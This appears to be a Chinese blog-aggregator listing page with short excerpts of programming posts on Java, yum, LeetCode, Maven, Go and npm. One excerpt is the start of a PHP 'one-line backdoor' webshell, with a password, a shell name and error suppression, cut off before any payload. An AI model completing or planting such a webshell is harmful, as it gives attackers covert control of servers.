对应java代码:packagecom.yoooya.ytp.utils.doc;importcom.aspose.words.Document;importcom.aspose.words.License;importcom.aspose.words.SaveFormat;importcom.yoooya.ytp.utils.DateUtils;importcom.yoooya.ytp.util
分类:
编程语言 时间:
2020-05-16 10:46:26
阅读次数:
66
使用vsftp配置本地yum源 1、安装vsftp 使用vmware安装好CentOS 8.1 后,开机会自动挂载,此时进入挂载目录下的 AppStream/Packages 下,执行以下命令安装vsftp 修改配置文件 /etc/vsftpd/vsftpd.conf 的 为 否则下面的配置yum会 ...
分类:
其他好文 时间:
2020-05-16 00:26:33
阅读次数:
169
我的LeetCode:https://leetcode cn.com/u/ituring/ 我的LeetCode刷题源码[GitHub]:https://github.com/izhoujie/Algorithmcii LeetCode 面试题64. 求1+2+…+n 题目 求 1+2+...+n ...
分类:
其他好文 时间:
2020-05-16 00:12:43
阅读次数:
76
1 package test_13_2; 2 3 public class Outer { 4 5 private String str; 6 7 public Outer() { 8 9 } 10 11 public Outer(String str) { 12 13 this.str = str ...
分类:
编程语言 时间:
2020-05-15 22:56:38
阅读次数:
82
``` // ?.h : 头文件 #pragma once #include #include #include // ?.cpp //#include CString DosPathToNt(IN TCHAR *szDosPath) { CString ret; try { TCHAR szDri... ...
分类:
编程语言 时间:
2020-05-15 19:52:27
阅读次数:
74
配置数据库环境,创建数据库和表 创建maven空项目,并添加web组件支持 导入pom依赖 <dependencies> <!--Junit--> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <versio ...
分类:
其他好文 时间:
2020-05-15 15:54:56
阅读次数:
87
在 Idea 安装 Alibaba Cloud Toolkit 插件 步骤: Prefererences Plugins Marketplace 搜索Alibaba Cloud Toolkit Install Restart Idea 创建简单项目 使用 Idea 创建 SpringBoot 项目: ...
分类:
编程语言 时间:
2020-05-15 15:26:29
阅读次数:
160
evalPHP一句话后门 <?php $password='c2.o'; $shellname='BY:FBI'; $myurl='http://www.baidu.com'; error_reporting(E_ERROR | E_PARSE);@set_time_limit(0); ob_sta ...
分类:
Web程序 时间:
2020-05-15 13:23:16
阅读次数:
242
前言(为什么要写这篇文章) 首先看过我博客的都应该知道,我去年发了一篇Python封装Elasticsearch的文章。但那是去年了,今年我将我的检索服务后端用Golang全部重写了一波,相当于用Go重构了以前的Python代码,不过我个人感觉Golang的效率还是高于Python的,而且我还加了一 ...
分类:
其他好文 时间:
2020-05-14 13:50:31
阅读次数:
74
npm install g yapi cli registry https://registry.npm.taobao.org $ sudo npm install g yapi cli registry https://registry.npm.taobao.org /usr/local/bin/ ...